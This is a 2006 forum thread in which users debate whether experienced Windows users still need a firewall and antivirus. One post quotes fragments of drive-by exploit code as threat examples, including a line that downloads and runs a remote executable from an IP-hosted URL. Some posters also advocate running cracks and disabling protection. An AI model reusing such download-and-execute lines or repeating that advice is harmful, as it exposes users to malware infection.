I'm an advanced windows user. Should I still use a firewall and AV?

Discussion in 'other security issues & news' started by Pain of Salvation, May 12, 2006.

Thread Status:
Not open for further replies.
  1. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma

    If what you say is true you are a very rare exception. In the real world it just doesn't happen that way. The malware is getting very sophistacated and even specialized apps are having trouble detecting some of it and there is no way you can do it without them. How would you know if you had a rootkit without a specalized detector, you couldn't .
     
  2. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    Hi Mrk...
    No one has. It's never fully patched. It can be fully updated, but that doesn't mean it's actually patched (which would mean "perfect").
    And even if it was possible to be perfectly patched, one would still have to go through the trouble of keeping it that way. Technologies evolve - they live and die.
     
    Last edited: May 14, 2006
  3. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Not often,but in some cases like when i download and run cracks and to be sure that my pc is clean. Anyway...My computer says thanks to me,cos there´s not ram consumption regarding anti virus running all the time.


    I don´t. I just priorize what is being explored. Social engineering is an example. If a new thread appears,it will be probably (very low) harmless.

    I agree with you. I might be wrong even that kaspersky online scanner says i´m clean.

    "Perhaps you're a zombie who doesn't even know he's one, hhmmm!?"

    I trust on Kaspersky online scanner and as a second opinion,sometimes I use others(online scanner)

    "If you're on XP SP2, then I bet you did not stop the default-enabled inbound firewall, right?"

    I did it. I don´t see a concret reason to keep it running and spare my ram.

    Cheers
     
  4. Bob D

    Bob D Registered Member

    Joined:
    Apr 18, 2005
    Posts:
    1,234
    Location:
    Mass., USA
    I consider myself as an "advanced" automobile user (driver).
    But I always wear my seatbelt and make sure my car insurance is up to date.
     
  5. lotuseclat79

    lotuseclat79 Registered Member

    Joined:
    Jun 16, 2005
    Posts:
    5,390
    Re: I'm an advanced windows user. Shoud I still use a firewall and AV?

    If I were you, I would download and run the following to help determine if there are any stealthed rootkits hiding on your computer you don't know about if you are without firewall and AV and have not already done so:

    RootkitRevealer v1.7: http://www.sysinternals.com/SecurityUtilities.html
    BlackLight: http://www.f-secure.com/blacklight/try.shtml (beta 'til 1 June '06)
    RootKitHookAnalyzer: (freeware) http://www.resplendence.com/hookanalyzer (information about)

    ~removed direct download link to hookanalyzer....Bubba~

    -- Tom
     
    Last edited by a moderator: May 14, 2006
  6. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    Nobody could agree with that statement you're making. Who can be sure future threads would 'probably' be relatively 'harmless'? No advanced user would ever say such a thing.
    Incorrect again. I meant to say you were incorrect when stating you never use AV's.
    You surely don't spare internet bandwidth nor time by online scanning.
     
    Last edited: May 14, 2006
  7. dylanfan

    dylanfan Registered Member

    Joined:
    Feb 10, 2006
    Posts:
    187
    [Well, we'll have to take your word on that ;):D]
    Seriously, I agree with what Bob is trying to communicate here. It's these kinds of habits which more than probably contribute to making one an advanced driver and give one some right to call oneself such. Same thing in Cyberworld: intelligent information, well thought-out habits, then -maybe- some right to be called "advanced".

    BTW Bob, some digression here...
    I know that in Belgium, people are always encouraged to practice safe driving when going out for a 'fiesta' [the party, not the car] by volunteering a 'Bob' (if he's a man) or a 'Bobette' (if a woman) who spends the party enjoying without drinking any drop of alcohol. This way, the whole group knows it can rely on him (her) to safely bring everybody home at the end of the night...I think the names relate to two young belgian comics heroes

    Cheers
     
    Last edited: May 14, 2006
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Re: I'm an advanced windows user. Shoud I still use a firewall and AV?

    I did say,

    "There are other ways to prevent the unexpected/inadvertant mishap."

    Here is an old one:

    Code:
    Function InitPaths
    Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit=MS03-032"        
    
    http://www.rsjones.net/imgs/rem-1.gif

    This had not yet been detected by AV:

    http://www.rsjones.net/imgs/rem-1a.gif
    _____________________________________________________________

    Code:
    GetProcAddress-LoadLibrary-GetSystemDirectory-
    urlmon.dll-URLDownloadToFile-WinExec- 
    HxxP://195.225.177.33/vx/win32.exe
    
    http://www.rsjones.net/imgs/rem-2.gif
    _____________________________________________________________


    Code:
    script sClickUrl = 'http://certified-safe-downloads.com/adserver/RegClean_W0.exe
    sTrackingUrl = 'hxxp://certified-safe-downloads.com/
    
    http://www.rsjones.net/imgs/rem-3.gif
    _____________________________________________________________

    Agreed. In answer to the original poster's first post, I'm saying that AV is not necessary, that there are other ways. Then, with his second post, I suggested that he take stock of his own situation and plan accordingly.

    The typical users I work with would have very little possibility of encountering these drive-by exploits in the first place, due to the types of sites on which they occur.

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
  9. The Iceman

    The Iceman Registered Member

    Joined:
    May 3, 2006
    Posts:
    1
    Location:
    Aylmer, Quebec
    The only User who does not need an AV, Firewall, and Anti Spy should have no CDROM Drive, no Floppy Drive or USB Ports and no Internet Connection.

    Also; the more Advanced a User believes he is , the more tendancy he has to get into trouble.

    My Humble Opinion for what it is worth.


    The Iceman

    MCSE
    CNE
    CNA
    A+
    Microsoft Power User

    :rolleyes:
     
  10. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma

    :thumb: :thumb:
     
  11. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,213
    Hello,
    I must disagree Iceman.
    The more you know the more you get into trouble - correct, but you also know how to get out of trouble. You do not need firewall, av and anti-spy to stay safe. I tell this without arrogance - simple truth of more than 6 years of surfing the net (5 or so on broadband), with lots of porn, p2p and whatnot. And I call myself conservative, because I have friends who do 10 times more daring things than I do and nothing happens.
    I do not deny the threat - it's real, it's out there.
    But it does not happen magically. You just need to know when and where to be, like in life. Only it's much simpler, because if you don't like something, you hit the reset button and start over. Wish life were so simple eh?

    Apropos seat belts, this does not apply! Because you can die in car accident whereas the worst that can happen with computers is 6-7 hours of reformat.

    Cheers,
    Mrk
     
  12. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Why not? What else could be expected? There´s no much surprise.
    And also it´s better living in the present.
    But let´s say that a new thread is coming. Wouldn´t you be prepared?
    Fact #1: Windows xp is getting old and the lamers/crackers change they focus.
    Now do you see any new attack to Windows 95 or Windows 3.1? The focus are Windows 2000/XP/2003(that´s the present since there are a lot of people using it).

    Fact #2: MS is making improvements in Windows Vista. Even so I´ll use Windows XP for a long time.
     
  13. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,639
    even if a threat is expected, it doesnt make it harmless. theres lots of people whose computers are vulnerable to rootkits, drivers, and other malware.

    "advanced" users arent as likely to become infected, but its still better to be safe than sorry.
     
  14. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    "Just to shoot a very big hole in your security without AV/FW. have you ever heard of drive by downloads?? with out av or fw you would never know it was happening and once it does happen it could be relativly harmless but that is not likely to be the case."

    I know drive by downloads,but I don´t use IE.
     
  15. Alphalutra1

    Alphalutra1 Registered Member

    Joined:
    Dec 17, 2005
    Posts:
    1,160
    Location:
    127.0.0.0/255.0.0.0
    Ever heard of java or javascript :ninja:

    Alphalutra1
     
  16. washington2004

    washington2004 Registered Member

    Joined:
    May 14, 2006
    Posts:
    10
    Yes...I don´t like java,it is too slow. That´s why it´s not installed on my firefox.
     
  17. Alphalutra1

    Alphalutra1 Registered Member

    Joined:
    Dec 17, 2005
    Posts:
    1,160
    Location:
    127.0.0.0/255.0.0.0
    Actually java is faster than c++ :eek: ;)

    Anyhow, I assume that you mean JRE is not installed? Because you can't unistall java from firefox, you can only disable firefox from being able to use it. Also, since you seem to use colors and smilies in your post, then you use javascript ;) (unless you have memorized some bbcode) which is different than java. I would recommend noscript extension to help you out there.

    Alphalutra1
     
  18. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    An "advanced" user would surely be one able to make their own decisions about the risks they face and how to address them? ;)

    It is possible to run a secure system without an anti-virus, provided you use other means to control what programs are allowed to run (e.g. Process Guard, System Safety Monitor, AppDefend, etc). However you do need to ensure that: (a) Windows cannot run any programs without your explicit consent and (b) you are aware of what constitutes "normal" activity on your system and can recognise (and block) anything "abnormal".

    A firewall (with good leaktest detection capability) is also important in providing extra information on program behaviour (svchost.exe connecting to windowsupdate.com may be normal but svchost.exe connecting to dsl33-449-1002.randomuser.randomISP.com certainly isn't). While malware doesn't have to connect to the Internet to cause problems, in practice they virtually all do.
     
  19. sweater

    sweater Registered Member

    Joined:
    Jun 24, 2005
    Posts:
    1,678
    Location:
    Philippines, the Political Dynasty Capital of the
    Mr. Bond you're on drugs...:D hehehe...:D ;)

    Did you know that most of the car accidents happens coz it was drove by "expert car drivers"? They are so confident with their expertise in driving a car that no one can teach them how to slow down and to be careful while driving. Same thing with pc connected to cyber space... :cautious: :blink:

    Protection is a must whatever and whoever you are, you must always wear condom everytime you visits those unknown places w lots of beautiful babes out there. :-* :cool:

    I think, there are always some guys out there that are probably more advanced and ahead than you... and they always has the passion of destroying your pc. :oops: :p

    So even if you are Mr. Bond, still, you need a Firewall and Anti-virus. An ounce of prevention is more better than a ....cure..(ah whatever...o_O )..
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.